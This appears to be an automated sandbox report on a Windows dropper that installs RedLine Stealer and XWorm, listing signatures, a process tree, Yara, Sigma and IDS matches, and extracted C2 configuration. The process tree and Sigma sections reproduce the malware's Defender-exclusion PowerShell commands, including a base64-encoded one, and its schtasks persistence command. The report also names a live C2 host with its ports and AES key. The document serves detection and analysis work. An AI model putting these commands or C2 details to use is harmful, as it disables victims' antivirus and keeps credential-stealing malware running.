
Windows Analysis Report
f5ATZ1i5CU.exe

Overview

General Information

Sample name: f5ATZ1i5CU.exe (renamed because the original name is a hash value)
Original sample name: fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80.exe
Analysis ID: 1571409
MD5: 854a42e9a581b2a33ceda0f3d3dd2f04
SHA1: a100a400e570039823c4fd79dc470c13ccfbb266
SHA256: fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80
Tags: C2-at-pastebin-yd1QnTjKexeuser-JAMESWT_MHT
Infos:

Detection

Detected families: RedLine, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • f5ATZ1i5CU.exe (PID: 7928 cmdline: "C:\Users\user\Desktop\f5ATZ1i5CU.exe" MD5: 854A42E9A581B2A33CEDA0F3D3DD2F04)
    • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      (the -EncodedCommand value is base64 of UTF-16LE and decodes to: <#wcw#>Add-MpPreference <#mbb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hbv#> -Force <#xzz#>, i.e. it adds the entire user profile and the system drive as Windows Defender exclusions, with the <#...#> block comments used as junk padding)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • M2.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Roaming\M2.exe" MD5: 2598B5FEE38D9C0979F009E77F94EA33)
      • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Metin.exe (PID: 7184 cmdline: "C:\Users\user\AppData\Roaming\Metin.exe" MD5: 1D846637AA409D6DD4FD14F70A63F907)
      • powershell.exe (PID: 8144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3496 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Chrome.exe (PID: 8048 cmdline: C:\Users\user\AppData\Roaming\Chrome.exe MD5: 1D846637AA409D6DD4FD14F70A63F907)
  • Chrome.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Roaming\Chrome.exe" MD5: 1D846637AA409D6DD4FD14F70A63F907)
  • Chrome.exe (PID: 5512 cmdline: "C:\Users\user\AppData\Roaming\Chrome.exe" MD5: 1D846637AA409D6DD4FD14F70A63F907)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution |  | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
XWorm | Malware with a wide range of capabilities, ranging from RAT to ransomware. | No Attribution |  | https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
XWorm configuration (extracted): {"C2 url": ["duclog23.duckdns.org"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
RedLine configuration (extracted): {"C2 url": ["duclog23.duckdns.org:37552"], "Bot Id": "Metin"}
Yara matches on dropped files
Source | Rule | Description | Author | Strings
Source: C:\Users\user\AppData\Roaming\Metin.exe | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\Metin.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\Metin.exe | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0xa662:$s6: VirtualBox
  • 0xa5c0:$s8: Win32_ComputerSystem
  • 0xb440:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xb4dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xb5f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb1a4:$cnc4: POST / HTTP/1.1
Source: C:\Users\user\AppData\Roaming\Chrome.exe | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\Chrome.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

Yara matches on memory dumps
Source | Rule | Description | Author | Strings
Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x17c0a:$s6: VirtualBox
  • 0x17b68:$s8: Win32_ComputerSystem
  • 0x189e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x18a85:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x18b9a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1874c:$cnc4: POST / HTTP/1.1
Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0xa462:$s6: VirtualBox
  • 0xa3c0:$s8: Win32_ComputerSystem
  • 0xb240:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xb2dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xb3f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xafa4:$cnc4: POST / HTTP/1.1
Source: 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security

Yara matches on unpacked PEs
Source | Rule | Description | Author | Strings
Source: 9.0.Metin.exe.970000.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 9.0.Metin.exe.970000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 9.0.Metin.exe.970000.0.unpack | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0xa662:$s6: VirtualBox
  • 0xa5c0:$s8: Win32_ComputerSystem
  • 0xb440:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xb4dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xb5f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb1a4:$cnc4: POST / HTTP/1.1
Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security

System Summary

Sigma rule matches
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\f5ATZ1i5CU.exe", ParentImage: C:\Users\user\Desktop\f5ATZ1i5CU.exe, ParentProcessId: 7928, ParentProcessName: f5ATZ1i5CU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", ProcessId: 8000, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', ProcessId: 8144, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Chrome.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Metin.exe, ProcessId: 7184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe', ProcessId: 8144, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Metin.exe, ProcessId: 7184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", ProcessId: 3496, ProcessName: schtasks.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\f5ATZ1i5CU.exe", ParentImage: C:\Users\user\Desktop\f5ATZ1i5CU.exe, ParentProcessId: 7928, ParentProcessName: f5ATZ1i5CU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", ProcessId: 8000, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Metin.exe" , ParentImage: C:\Users\user\AppData\Roaming\Metin.exe, ParentProcessId: 7184, ParentProcessName: Metin.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe", ProcessId: 3496, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\f5ATZ1i5CU.exe", ParentImage: C:\Users\user\Desktop\f5ATZ1i5CU.exe, ParentProcessId: 7928, ParentProcessName: f5ATZ1i5CU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA=", ProcessId: 8000, ProcessName: powershell.exe
Suricata IDS alerts
Timestamp                        SID      Severity  Classtype                                      Source IP     Src Port  Destination IP  Dst Port  Protocol
2024-12-09T11:05:00.561202+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49704     192.169.69.26   37552     TCP
2024-12-09T11:05:16.188278+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49740     192.169.69.26   37552     TCP
2024-12-09T11:05:31.798637+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49777     192.169.69.26   37552     TCP
2024-12-09T11:05:47.256001+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49813     192.169.69.26   37552     TCP
2024-12-09T11:06:02.699270+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49849     192.169.69.26   37552     TCP
2024-12-09T11:06:18.133356+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49885     192.169.69.26   37552     TCP
2024-12-09T11:06:33.645441+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49923     192.169.69.26   37552     TCP
2024-12-09T11:06:49.183070+0100  2849662  1         Malware Command and Control Activity Detected  192.168.2.10  49960     192.169.69.26   37552     TCP



AV Detection

Source: f5ATZ1i5CU.exe | Avira: detected
Source: http://duclog23.duckdns.org:37552 | Avira URL Cloud: Label: malware
Source: duclog23.duckdns.org:37552 | Avira URL Cloud: Label: malware
Source: http://duclog23.duckdns.org:37552/ | Avira URL Cloud: Label: malware
Source: http://duclog23.duckdns.org | Avira URL Cloud: Label: malware
Source: duclog23.duckdns.org | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Metin.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Roaming\Chrome.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Roaming\M2.exe | Avira: detection malicious, Label: HEUR/AGEN.1305500
Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["duclog23.duckdns.org"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 6.0.M2.exe.2f0000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["duclog23.duckdns.org:37552"], "Bot Id": "Metin"}
Source: C:\Users\user\AppData\Roaming\Chrome.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\M2.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Roaming\Metin.exe | ReversingLabs: Detection: 95%
Source: f5ATZ1i5CU.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Metin.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Chrome.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\M2.exe | Joe Sandbox ML: detected
Source: f5ATZ1i5CU.exe | Joe Sandbox ML: detected
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: duclog23.duckdns.org
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: 7000
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: <123456789>
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: <Xwormmm>
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: Metin
